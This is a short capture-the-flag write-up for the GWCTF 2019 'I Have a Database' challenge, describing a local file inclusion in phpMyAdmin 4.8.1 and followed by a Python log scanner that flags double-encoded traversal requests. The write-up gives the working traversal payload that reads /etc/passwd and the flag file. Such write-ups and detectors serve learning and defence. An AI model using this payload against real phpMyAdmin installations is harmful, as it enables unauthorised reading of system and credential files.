[GWCTF 2019] 我有一个数据库 (I Have a Database)

Opening the challenge environment shows only garbled text; scanning with dirsearch reveals phpmyadmin.

Following the link shows that the version is 4.8.1.

I found a few references to study:

https://www.freebuf.com/column/207707.html

https://mp.weixin.qq.com/s?__biz=MzIzMTc1MjExOQ==&mid=2247485036&idx=1&sn=8e9647906c5d94f72564dec5bc51a2ab&chksm=e89e2eb4dfe9a7a28bff2efebb5b2723782dab660acff074c3f18c9e7dca924abdf3da618fb4&mpshare=1&scene=1&srcid=0621gAv1FMtrgoahD01psMZr&pass_ticket=LqhRfckPxAVG2dF%2FjxV%2F9%2FcEb5pShRgewJe%2FttJn2gIlIyGF%2FbsgGmzcbsV%2BLmMK#rd

https://www.jianshu.com/p/fb9c2ae16d09

Use ?target=pdf_pages.php%253f/../../../../../../../../etc/passwd to confirm whether the vulnerability is present.

Once the vulnerability is confirmed, testing reveals where the flag is located; requesting ?target=pdf_pages.php%253f/../../../../../../../../flag returns the flag.
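A log check for the request shape used above, as an added example that is not part of the original post: it percent-decodes the target parameter until it stops changing and flags values that contain a path traversal, noting when extra decoding rounds were needed (the %253f case). The log lines, the /phpmyadmin/index.php path and the IP addresses are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed access-log lines (combined format); path and IPs are made up.
SAMPLE_LOG = [
    '198.51.100.4 - - [09/Feb/2024:13:00:01 +0000] "GET /phpmyadmin/index.php?target=db_sql.php%3Fdb%3Dtest HTTP/1.1" 200 5120',
    '203.0.113.7 - - [09/Feb/2024:13:00:09 +0000] "GET /phpmyadmin/index.php?target=pdf_pages.php%253f/../../../../../../../../etc/passwd HTTP/1.1" 200 1893',
]

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')
TRAVERSAL = re.compile(r"(^|[/\\])\.\.([/\\]|$)")


def fully_decode(value, max_rounds=5):
    """Percent-decode until the value stops changing; return (value, rounds)."""
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(value)
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    return value, rounds


def suspicious_target(request_uri):
    """Return a reason if `target` carries a traversal, else None."""
    query = urlsplit(request_uri).query
    # parse_qs does the first decode, as the server does before the app sees it.
    for value in parse_qs(query, keep_blank_values=True).get("target", []):
        decoded, extra_rounds = fully_decode(value)
        if TRAVERSAL.search(decoded):
            if extra_rounds and "?" in decoded:
                return "multi-encoded '?' plus traversal"
            return "traversal"
    return None


def scan(lines):
    """Return (client_ip, reason) for every flagged request line."""
    hits = []
    for line in lines:
        m = REQUEST.match(line)
        reason = suspicious_target(m.group(2)) if m else None
        if reason:
            hits.append((m.group(1), reason))
    return hits


if __name__ == "__main__":
    for ip, reason in scan(SAMPLE_LOG):
        print(ip, reason)
```

A value that still changes after the server's own decode is the signal here: ordinary navigation links carry at most one layer of encoding in target.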

posted on 2024-02-09 13:04 跳河离去的鱼